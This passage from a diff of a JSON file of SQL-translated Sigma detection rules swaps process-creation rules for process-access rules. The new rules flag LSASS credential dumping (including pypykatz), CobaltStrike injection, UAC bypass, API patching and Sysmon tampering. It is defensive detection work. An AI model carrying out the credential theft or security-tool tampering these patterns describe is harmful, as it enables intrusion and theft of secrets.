'%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe' ESCAPE '\\') OR (TargetImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Program Files (x86)\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Program Files (x86)\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\Discord\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\Discord.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\AUDIODG.EXE' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\yammerdesktop\\\\app-%' ESCAPE '\\' AND SourceImage LIKE '%\\\\Yammer.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\yammerdesktop\\\\app-%' ESCAPE '\\' AND TargetImage LIKE '%\\\\Yammer.exe' ESCAPE '\\' AND GrantedAccess = '0x1000') OR (Provider_Name = 'Microsoft-Windows-Kernel-Audit-API-Calls') OR (TargetImage LIKE '%\\\\Evernote\\\\Evernote.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_turla_commands_critical.yml" + "filename": "proc_access_win_direct_syscall_ntopenprocess.yml" }, { - "title": "Allow Service Access Using Security Descriptor Tampering Via Sc.EXE", - "id": "6c8fbee5-dee8-49bc-851d-c3142d02aa47", - "status": "experimental", - "description": "Detects suspicious DACL modifications to allow access to a service from a suspicious trustee. This can be used to override access restrictions set by previous ACLs.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "UAC Bypass Using WOW64 Logger DLL Hijack", + "id": "4f6c43e2-f989-4ea5-bcd8-843b49a0317c", + "status": "test", + "description": "Detects the pattern of UAC Bypass using a WoW64 logger DLL hijack (UACMe 30)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1543.003" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%A;%' ESCAPE '\\') AND (CommandLine LIKE '%;IU%' ESCAPE '\\' OR CommandLine LIKE '%;SU%' ESCAPE '\\' OR CommandLine LIKE '%;BA%' ESCAPE '\\' OR CommandLine LIKE '%;SY%' ESCAPE '\\' OR CommandLine LIKE '%;WD%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND SourceImage LIKE '%:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' AND GrantedAccess = '0x1fffff' AND CallTrace LIKE 'UNKNOWN(0000000000000000)|UNKNOWN(0000000000000000)|%' ESCAPE '\\')" ], - "filename": "proc_creation_win_sc_sdset_allow_service_changes.yml" + "filename": "proc_access_win_uac_bypass_wow64_logger.yml" }, { - "title": "Suspicious Remote Child Process From Outlook", - "id": "e212d415-0e93-435f-9e1a-f29005bb4723", + "title": "CobaltStrike BOF Injection Pattern", + "id": "09706624-b7f6-455d-9d02-adee024cee1d", "status": "test", - "description": "Detects a suspicious child process spawning from Outlook where the image is located in a remote location (SMB/WebDav shares).", - "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a typical pattern of a CobaltStrike BOF which inject into other processes", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059", - "attack.t1202" + "attack.t1106", + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\outlook.exe' ESCAPE '\\' AND Image LIKE '\\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CallTrace REGEXP '^C:\\\\Windows\\\\SYSTEM32\\\\ntdll\\.dll\\+[a-z0-9]{4,6}\\|C:\\\\Windows\\\\System32\\\\KERNELBASE\\.dll\\+[a-z0-9]{4,6}\\|UNKNOWN\\([A-Z0-9]{16}\\)$' AND GrantedAccess IN ('0x1028', '0x1fffff'))" ], - "filename": "proc_creation_win_office_outlook_susp_child_processes_remote.yml" + "filename": "proc_access_win_cobaltstrike_bof_injection_pattern.yml" }, { - "title": "Stop Windows Service Via Net.EXE", - "id": "88872991-7445-4a22-90b2-a3adadb0e827", - "status": "experimental", - "description": "Detects the stopping of a Windows service", - "author": "Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems)", + "title": "Load Undocumented Autoelevated COM Interface", + "id": "fb3722e4-1a06-46b6-b772-253e2e7db933", + "status": "test", + "description": "COM interface (EditionUpgradeManager) that is not used by standard executables.", + "author": "oscd.community, Dmitry Uchakin", "tags": [ - "attack.impact", - "attack.t1489" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "There are many legitimate reasons to stop a service. This rule isn't looking for any suspicious behaviour in particular. Filter legitimate activity accordingly" + "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName IN ('net.exe', 'net1.exe') OR (Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\')) AND CommandLine LIKE '% stop %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CallTrace LIKE '%editionupgrademanagerobj.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_net_stop_service.yml" + "filename": "proc_access_win_load_undocumented_autoelevated_com_interface.yml" }, { - "title": "UAC Bypass via Windows Firewall Snap-In Hijack", - "id": "e52cb31c-10ed-4aea-bcb7-593c9f4a315b", + "title": "Rare GrantedAccess Flags on LSASS Access", + "id": "678dfc63-fefb-47a5-a04c-26bcf8cc9f65", "status": "experimental", - "description": "Detects attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in", - "author": "Tim Rauch", + "description": "Detects process access to LSASS memory with suspicious access flags 0x410 and 0x01410 (spin-off of similar rule)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1548" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Unknown" + "Legitimate software accessing LSASS process for legitimate reason" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\mmc.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%WF.msc%' ESCAPE '\\') AND NOT (Image LIKE '%\\\\WerFault.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND GrantedAccess LIKE '%10' ESCAPE '\\') AND NOT (((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskmgr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Malwarebytes\\\\Anti-Malware\\\\MBAMService.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\PROGRAMDATA\\\\MALWAREBYTES\\\\MBAMSERVICE\\\\ctlrupdate\\\\mbupdatr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\System32\\\\perfmon.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\wmiprvse.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Common Files\\\\McAfee\\\\MMSSHost\\\\MMSSHOST.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\GamingServices.exe' ESCAPE '\\') OR ((SourceImage LIKE '%\\\\PROCEXP64.EXE' ESCAPE '\\' OR SourceImage LIKE '%\\\\PROCEXP.EXE' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\VMware\\\\VMware Tools\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') AND SourceImage LIKE '%Antivirus%' ESCAPE '\\') OR ((SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent.exe' ESCAPE '\\')) OR (SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vs\\_bootstrapper\\_%' ESCAPE '\\' AND GrantedAccess = '0x1410') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\%' ESCAPE '\\')) OR (SourceCommandLine LIKE 'C:\\\\WINDOWS\\\\system32\\\\wermgr.exe -upload' ESCAPE '\\') OR (SourceImage LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\software\\_reporter\\_tool.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\DropboxUpdate.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\MBAMInstallerService.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\JetBrains\\\\Toolbox\\\\bin\\\\jetbrains-toolbox.exe' ESCAPE '\\')) OR (SourceImage LIKE '%\\\\xampp-control.exe' ESCAPE '\\' AND GrantedAccess = '0x410') OR (SourceImage LIKE '%\\\\SteamLibrary\\\\steamapps\\\\%' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x10'))))" ], - "filename": "proc_creation_win_uac_bypass_hijacking_firwall_snap_in.yml" + "filename": "proc_access_win_rare_proc_access_lsass.yml" }, { - "title": "Invoke-Obfuscation Via Stdin", - "id": "9c14c9fa-1a63-4a64-8e57-d19280559490", + "title": "Credential Dumping by Pypykatz", + "id": "7186e989-4ed7-4f4e-a656-4674b9e3e48b", "status": "test", - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects LSASS process access by pypykatz for credential dumping.", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND (CommandLine LIKE '%environment%' ESCAPE '\\' OR CommandLine LIKE '%invoke%' ESCAPE '\\' OR CommandLine LIKE '%input%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+%' ESCAPE '\\' AND CallTrace LIKE '%libffi-7.dll%' ESCAPE '\\' AND CallTrace LIKE '%\\_ctypes.pyd+%' ESCAPE '\\' AND CallTrace LIKE '%python3%.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_via_stdin.yml" + "filename": "proc_access_win_pypykatz_cred_dump_lsass_access.yml" }, { - "title": "Data Copied To Clipboard Via Clip.EXE", - "id": "ddeff553-5233-4ae9-bbab-d64d2bd634be", + "title": "LSASS Memory Access by Tool Named Dump", + "id": "9bd012ee-0dff-44d7-84a0-aa698cfd87a3", "status": "test", - "description": "Detects the execution of clip.exe in order to copy data to the clipboard. Adversaries may collect data stored in the clipboard from users copying information within or between applications.", - "author": "frack113", + "description": "Detects a possible process memory dump based on a keyword in the file name of the accessing process", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1115" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Unknown" + "Rare programs that contain the word dump in their name and access lsass" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\clip.exe' ESCAPE '\\' OR OriginalFileName = 'clip.exe'))" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE '%dump%' ESCAPE '\\' AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\'))" ], - "filename": "proc_creation_win_clip_execution.yml" + "filename": "proc_access_win_lsass_memdump_indicators.yml" }, { - "title": "Security Privileges Enumeration Via Whoami.EXE", - "id": "97a80ec7-0e2f-4d05-9ef4-65760e634f6b", + "title": "Potential NT API Stub Patching", + "id": "b916cba1-b38a-42da-9223-17114d846fd6", "status": "experimental", - "description": "Detects a whoami.exe executed with the /priv command line flag instructing the tool to show all current user privileges. This is often used after a privilege escalation attempt.", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects potential NT API stub patching as seen used by the project PatchingAPI", + "author": "frack113", "tags": [ - "attack.privilege_escalation", - "attack.discovery", - "attack.t1033" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND (CommandLine LIKE '% /priv%' ESCAPE '\\' OR CommandLine LIKE '% -priv%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (GrantedAccess = '0x1FFFFF' AND CallTrace LIKE 'C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND CallTrace LIKE '%)' ESCAPE '\\') AND NOT (((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\GitHubDesktop\\\\app-%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\GitHubDesktop.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\resources\\\\app\\\\git\\\\usr\\\\bin\\\\sh.exe' ESCAPE '\\') AND TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\GitHubDesktop\\\\app-%' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v%' ESCAPE '\\') AND SourceImage LIKE '%\\\\NGenTask.exe' ESCAPE '\\' AND (TargetImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v%' ESCAPE '\\')) OR ((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\taskhost.exe' ESCAPE '\\') AND (TargetImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v%' ESCAPE '\\') AND TargetImage LIKE '%\\\\NGenTask.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\stage\\\\Teams.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\Update.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\Update.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\WINDOWS\\\\SysWOW64\\\\regsvr32.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\Update.exe' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\stage\\\\Teams.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_whoami_priv_discovery.yml" + "filename": "proc_access_win_invoke_patchingapi.yml" }, { - "title": "Suspicious Cabinet File Expansion", - "id": "9f107a84-532c-41af-b005-8d12a607639f", - "status": "test", - "description": "Adversaries can use the built-in expand utility to decompress cab files as seen in recent Iranian MeteorExpress attack", - "author": "Bhabesh Raj", + "title": "SysmonEnte Usage", + "id": "d29ada0f-af45-4f27-8f32-f7b77c3dbc4e", + "status": "experimental", + "description": "Detects the use of SysmonEnte, a tool to attack the integrity of Sysmon", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1218" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ - "System administrator Usage" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\expand.exe' ESCAPE '\\' AND (CommandLine LIKE '%.cab%' ESCAPE '\\' OR CommandLine LIKE '%/F:%' ESCAPE '\\' OR CommandLine LIKE '%-F:%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Temp\\\\%' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\UpdateService\\\\ServiceShell.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\Dell\\\\UpdateService\\\\Temp\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((TargetImage LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' AND GrantedAccess = '0x1400') AND NOT (((SourceImage LIKE 'C:\\\\Program Files%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\'))) OR CallTrace = 'Ente'))" ], - "filename": "proc_creation_win_expand_cabinet_files.yml" + "filename": "proc_access_win_hack_sysmonente.yml" }, { - "title": "Suspicious Process Created Via Wmic.EXE", - "id": "3c89a1e8-0fba-449e-8f1b-8409d6267ec8", + "title": "Malware Shellcode in Verclsid Target Process", + "id": "b7967e22-3d7e-409b-9ed5-cdae3f9243a1", "status": "test", - "description": "Detects WMIC executing \"process call create\" with suspicious calls to processes such as \"rundll32\", \"regsrv32\", etc.", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a process access to verclsid.exe that injects shellcode from a Microsoft Office application / VBA macro", + "author": "John Lambert (tech), Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1047" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%process %' ESCAPE '\\' AND CommandLine LIKE '%call %' ESCAPE '\\' AND CommandLine LIKE '%create %' ESCAPE '\\' AND (CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%comspec\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%localappdata\\%%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\verclsid.exe' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF') AND ((CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND CallTrace LIKE '%VBE7.DLL%' ESCAPE '\\') OR (SourceImage LIKE '%\\\\Microsoft Office\\\\%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmic_susp_process_creation.yml" + "filename": "proc_access_win_malware_verclsid_shellcode.yml" }, { - "title": "Suspicious TSCON Start as SYSTEM", - "id": "9847f263-4a81-424f-970c-875dab15b79b", + "title": "Suspicious GrantedAccess Flags on LSASS Access", + "id": "a18dd26b-6450-46de-8c91-9659150cf088", "status": "experimental", - "description": "Detects a tscon.exe start as LOCAL SYSTEM", + "description": "Detects process access to LSASS memory with suspicious access flags", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Unknown" + "Legitimate software such as AV and EDR" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND Image LIKE '%\\\\tscon.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' 